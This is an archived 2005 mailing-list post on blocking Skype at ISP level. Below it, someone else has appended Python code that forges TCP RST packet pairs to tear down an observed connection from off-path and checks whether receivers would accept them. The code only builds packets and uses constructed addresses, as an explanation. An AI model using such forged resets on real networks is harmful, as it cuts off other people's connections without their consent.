lists.openwall.net - Open Source and information security mailing list archives
Date: Mon Apr  4 13:18:46 2005
From: fw at deneb.enyo.de (Florian Weimer)
Subject: Blocking Skype on ISP level

* Jochen Kaiser:

> This can be achieved by using an IDP system and blocking the
> appropriate p2p protocol (I forgot which one. Overnet?).
> An IDP is a device which works with signatures as known from
> IDS systems and instead of reporting malicious activity
> it blocks packets or connections. Therefore it must be placed
> in your forwarding path.

The latter is not necessary if the targeted application uses TCP
connections or similar things that do not cryptographically secure
the connection against teardown by suitably spoofed packets.  However,
my experiments in this area indicate that a lot of clients try to
immediately reestablish connections, and bandwidth utilization goes up
significantly (although the application does not make forward
progress).

A compromise would be injection of IGP routes, to just route traffic
to suspicious targets through the device.  I'm not sure if such
products already exist on the market because considerable diligence is
required to avoid loops.

> At the moment, there are fast Linux-based appliances which are
> capable of forwarding a few hundred megabits depending on the
> ruleset. (It is worth mentioning that the bandwidth is not the
> problem here, but that you will get jitter and delays by using
> a forwarding device in software where ASICs/FPGAs should be used.
> So as an ISP who shall grant the best quality for all customers the
> usage of a software-based IDP may not be the appropriate way.
> For the end customer it may be the right choice.)

Are your lab results available to interested parties?  A medium-sized
research network is considering the installation of such devices for
all of its sites, and it could well be possible to resolve the legal
obstacles.
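An added example (my code, not part of Florian Weimer's or Jochen Kaiser's message) of what "teardown by suitably spoofed packets" from a device that is *not* in the forwarding path amounts to. A sensor on a mirror port sees one segment of a TCP connection, learns the 4-tuple and the current sequence numbers, and forges a RST in each direction; each RST carries exactly the sequence number its recipient expects next. The observed segment, the addresses and the ports are constructed for the example; nothing is sent, the code only builds the segments and checks them with the receiver's own acceptance rule. One caveat the thread predates: RFC 5961 (2010) makes current stacks honour a RST only when its SEQ equals RCV.NXT exactly, answering an in-window but inexact SEQ with a challenge ACK, so the sensor needs accurate sequence tracking rather than just the 4-tuple. The reconnect storm Florian reports is the other practical cost and is not modelled here.

```python
import socket
import struct


def ipv4_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_tcp(src, sport, dst, dport, seq, ack, flags, payload=b"", window=65535, ttl=64):
    """Assemble a complete IPv4/TCP packet (20-byte headers, no options)."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags, window, 0, 0) + payload
    pseudo = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", ipv4_checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, ttl, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:]
    return ip + tcp


def parse_segment(pkt: bytes) -> dict:
    """Pull out what an observer needs: 4-tuple, seq/ack, flags, payload length."""
    ihl = (pkt[0] & 0x0F) * 4
    sport, dport, seq, ack, off_flags, window = struct.unpack("!HHIIHH", pkt[ihl:ihl + 16])
    doff = (off_flags >> 12) * 4
    return {
        "src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": off_flags & 0x1FF, "window": window,
        "payload_len": len(pkt) - ihl - doff,
    }


def checksums_valid(pkt: bytes) -> bool:
    """A receiver silently drops the forgery if either checksum is wrong."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:]
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return ipv4_checksum(pkt[:ihl]) == 0 and ipv4_checksum(pseudo + tcp) == 0


RST_ACK = 0x014  # RST (0x004) | ACK (0x010)


def forge_teardown(obs: dict) -> tuple:
    """Given one observed segment src->dst, forge the RST pair an out-of-path
    sensor would send: one to dst (impersonating src) and one to src
    (impersonating dst).  The sequence numbers are chosen so that each RST
    carries exactly the next sequence number its recipient expects."""
    next_seq = (obs["seq"] + obs["payload_len"]) & 0xFFFFFFFF
    to_dst = build_tcp(obs["src"], obs["sport"], obs["dst"], obs["dport"],
                       seq=next_seq, ack=obs["ack"], flags=RST_ACK)
    to_src = build_tcp(obs["dst"], obs["dport"], obs["src"], obs["sport"],
                       seq=obs["ack"], ack=next_seq, flags=RST_ACK)
    return to_dst, to_src


def rst_accepted(rst: bytes, rcv_nxt: int, rcv_wnd: int, strict: bool = True) -> bool:
    """Receiver-side acceptance test.  RFC 793: the RST's SEQ must lie inside
    the receive window.  RFC 5961 (strict, what current stacks do): only
    SEQ == RCV.NXT resets immediately; an in-window but inexact SEQ gets a
    challenge ACK instead, which this function reports as not accepted."""
    seg = parse_segment(rst)
    if not seg["flags"] & 0x004:
        return False
    if strict:
        return seg["seq"] == rcv_nxt
    return ((seg["seq"] - rcv_nxt) & 0xFFFFFFFF) < rcv_wnd


# Constructed observation (not real traffic): a client pushing 4 bytes to a
# peer on an arbitrary high port; addresses are documentation/private ranges.
OBSERVED = build_tcp("10.0.0.5", 40001, "203.0.113.7", 33033,
                     seq=1000, ack=5000, flags=0x018, payload=b"ping")  # PSH|ACK

if __name__ == "__main__":
    obs = parse_segment(OBSERVED)
    to_dst, to_src = forge_teardown(obs)
    for name, rst in (("to_dst", to_dst), ("to_src", to_src)):
        p = parse_segment(rst)
        print(name, p["src"], p["sport"], "->", p["dst"], p["dport"],
              "seq", p["seq"], "ack", p["ack"], "checksums ok:", checksums_valid(rst))
    print("strict, rcv_nxt=1004:", rst_accepted(to_dst, 1004, 65535))
    print("strict, rcv_nxt=1010:", rst_accepted(to_dst, 1010, 65535))
    print("RFC 793 only, rcv_nxt=990:", rst_accepted(to_dst, 990, 65535, strict=False))
```

The point the receiver-side check makes is the one behind Florian's remark: the device never has to carry the traffic, it only has to see enough of it to know the sequence numbers, and once the RST lands at RCV.NXT the connection is gone whether or not the device is inline. Applications that authenticate their transport (or run over UDP with their own session layer) are not affected by this, which is the limit of the approach.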
